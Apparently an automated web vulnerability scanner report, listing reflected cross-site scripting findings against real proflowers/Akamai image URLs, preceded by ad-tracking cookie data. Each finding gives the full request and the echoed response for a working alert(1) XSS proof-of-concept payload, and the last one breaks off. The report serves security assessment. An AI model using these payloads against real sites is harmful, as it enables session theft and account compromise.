rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s48j="MLsXrqMOJjhv5pB0GuK8L0G3v0lm6Jub5RPOlOqTe4bwXJoZcq+UbnlmhOBhXf5iQTJk/quwLpxqtP9GqCKLRqJJAW3ERa9522Y3c+jzTLCbNefpygq1t8AuaMXzycfsvZZsXhu+Khv10rUO1cy3NXmzFcyYbPBb09aMYXjJ822e1Q7/ElwgfRLN3pn/1mAypzCMOG4b28tgIOtUWTBmulp5e6AfPHNlRMbSaoXKYkuSpZEvc1wOxDlyyn8xdJwOFk8g1XucIRlWrmaYiyVxIG+u3yBx/kt5blOfVSKJhfuza4GCvepswCgGc6U4nVJlLIh6c52snKpl9l/2Qebjzk11/ByzI7i8z1Zpr30Oa7IeNHp5P19QYgzDsyOSh+zPbYle82aztXJAb97XsuXpAThUS5Sz5idOic/xT3RQ2hhfdguGby2z59ngM+DIell5UMzqQYmh/CZhKCj1ZpQQvfz0bxxBSoyaveJ/ieowILIMymdszvD876DwGyxqXNoPEmN+iXp+1N/YdWjpPGkkDlStS5THRh1HTa8MJKmAROP5m4KLKBHb7VDAxdcDYcJ1WVcznBdRdf7bmpGxmbJyWmyedox3lcVJjZHTryFWuB+/AKHardLq+ZC8qA/dFaDCtG3lbOG2NUUhhKZJE/iKOwAtVxvE/uzMsIC9yQqy4zfhNonSsShjqzmLvmEa8qTSeMMnsgrjf5IID8HOPjlyiVfir4Np0rZG9c8l/bk29gzOTHWp0YkxR4oMjlqvWsndyKi1tg+hIMGhKagnbzYFNpm/spXNcN8qj8+89r3PzhUKkc1yFEXHQCoVGMA0tCowfcaGas0hBbm9or1oIURPOAUkjSXEAqxfbS3Ci++7gQjn3qifAD/5yK0DIlxHJH2Z/NIsGuCYkemULDpKPI9T5TnHzgQgaAVh1NBzpxvVNAQAEM/K5b0RudLduAqFoKYz8Dhe7QdDHKkftjM/FHcmr297NIfp8Qz7yEnxNk7uzarw8pvYwOFaDehW6Pc31JTK1tiBMhxKm2eTFSgN"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM9IzlDOAYc1U1kNgyhQng1Be7z7sLKw1xd7M/G6n4G+PviQjXOwUXKLcB48iFx8crf5HGEfF0887Q+iy3epGgFRZvmgTn1Qcp+ICmLmBprGKXIekE7Jl4bGa9oQC5IaLHOyw/Br6Qj6IQuoNj5mfJvLHqNgmqX9PdDfXFrZEEA9wHOZJ0motkDFe/vAeaB5Xp/5EVLHgOk7O6boUcDvIMREIphiKzK1Chi6xHSKPQfHUA0w9NV/4Z6E9R/aSZzi+KuSrbSLVztAAxSiwXlvAQ65absewpdZoy+uIXZL0iV02cnknuLa9//+XnBHR0Gf6UCl6WonVLCctZrPSG7osK+6ibEZuxs1J5dOjkzv+lUChocqxKkS83YuK3zosM9HVRWCHO9ZTvAPBFuNGe2tkr1WkHLmhmgpoVMAM67ByzAUObHSWgMKEY5Sku1bUJzj1hRanuffQf640okMVZK9l8GX0X9lIk+lzCMzbcV0f92zKSQG3mEb7PrxNNEpGmsF2lk3+vEHFWQGR6wXjVVUjh2h2CyFg7zc0IbKw5AJ6SFaoAj3GsJkdKUg6jcwjxsFn10+PxBQ3eiHzmfZzg5wuWs0KzgnhRS0JVObI1U8uM4CvDyLdIPNRJZNTiaOElKtl/1hUqSmAG+vmw64AfdEHU9+3pcoVPrPRyKpRbNv/rPvs+fupyE6BxZpJRPvvcfwyDWGWB3bvNb3b1FHzh3JcOfVbJv84k6iSuL074poA9xrOIAe+nyjIMy1fqRo5xI8tq5NVTASv7fRGtdl681WgLTFW7zXyvocArwa2L0Wk38pQK38Sdh//PeH/nbICXmw2pRW36GSCcM5qoF1B0lkphF+UBgarQW3Vcl+i0jP/aa4q7QF5WScoYL7gcotuYpX4JI4uQ/Z+PFzM2jaN/mc1igfcIUNBvDj9ji1ZXfNRUtNZN9ggKYDKWcKI03XAeR2fOOyAIC5vFNjil49imrT9stNuCV9Y+kjENDfwsUD54quOzPiiUggHr/hIrULsX0lpf9f9j4/doOk0AdUME/uvUMx1QiGbMVQX3s9Jcq1Gsj/o7aJAfVA4qf/funtCsIYE6PIuKqE4XCJDVuHo5QSI97nWrx06n2wHknf0Qfbl+vvSv3mnv+t4JjaPb6e0QhUnPkUrg88uAXeNjfwGJWAP7ZQfUgB/WaDNDhyLWP/Yh3rCUCR8uHaCQI9sKWAVbPw6iO5kceIVQzUWPMVKTcRB5qOOGrh3S5d5Urf1tG13gpjjuJ3PUTSeA16Ot6LDFVi5mcIBL8J4aZnR3klIKAk6kSjHkyA9SaYV9G84MU6EkJCzKx8ihoJoi04bbStfFZ/yfYBAbahOI4r0ZmIncghLeaJISxxd4RdBaStFPe5yWkeMLSY5xmbMq/Bc1FtQn9uYzJCBg5XvCKLU5my9/plxSgMR4fiVWSX0IM7P/nfQsaJG6bZeBxB/bPB1a+MuzhK7j5W3SnHNaojJlAe5OtFr8pKFNrxmxL8VOF0PcdCWqH/IjrUOXMoeBySv2OxuNlxuo="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:04:19 GMT


4. Cross-site scripting (reflected)  previous  next
There are 212 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c was submitted in the REST URL parameter 9. This input was echoed as 1fc4e<img src=a onerror=alert(1)>27c92c8ec6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:33 GMT
Connection: close

Unable to find /ProvideCommerce/8inwoodtaper_tn1fc4e<img src=a onerror=alert(1)>27c92c8ec6c

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7 was submitted in the REST URL parameter 9. This input was echoed as e86fb<img src=a onerror=alert(1)>9d7791613a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tne86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:32 GMT
Connection: close

Unable to find /ProvideCommerce/8inwvnbskt_tne86fb<img src=a onerror=alert(1)>9d7791613a7

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f was submitted in the REST URL parameter 9. This input was echoed as 532b2<img src=a onerror=alert(1)>e8b79cc0d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img src=a onerror=alert(1)>e8b79cc0d7f

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579 was submitted in the REST URL parameter 9. This input was echoed as dc0ce<img src=a onerror=alert(1)>2e0a0929579 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PFdc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_3months_PFdc0ce<img src=a onerror=alert(1)>2e0a0929579

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19 was submitted in the REST URL parameter 9. This input was echoed as 3cd85<img src=a onerror=alert(1)>293739f3d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_6months_PF3cd85<img src=a onerror=alert(1)>293739f3d19

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe was submitted in the REST URL parameter 9. This input was echoed as 6e79d<img src=a onerror=alert(1)>461165d53fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:17 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img src=a onerror=alert(1)>461165d53fe

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9 was submitted in the REST URL parameter 9. This input was echoed as 8c050<img src=a onerror=alert(1)>d2aadd692a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_12months_PF8c050<img src=a onerror=alert(1)>d2aadd692a9

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127 was submitted in the REST URL parameter 9. This input was echoed as 219a4<img src=a onerror=alert(1)>731292b4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_3months_PF219a4<img src=a onerror=alert(1)>731292b4127

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6 was submitted in the REST URL parameter 9. This input was echoed as 42d6c<img src=a onerror=alert(1)>7a0481f0a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_6months_PF42d6c<img src=a onerror=alert(1)>7a0481f0a6

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2 was submitted in the REST URL parameter 9. This input was echoed as efcc5<img src=a onerror=alert(1)>06385eca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

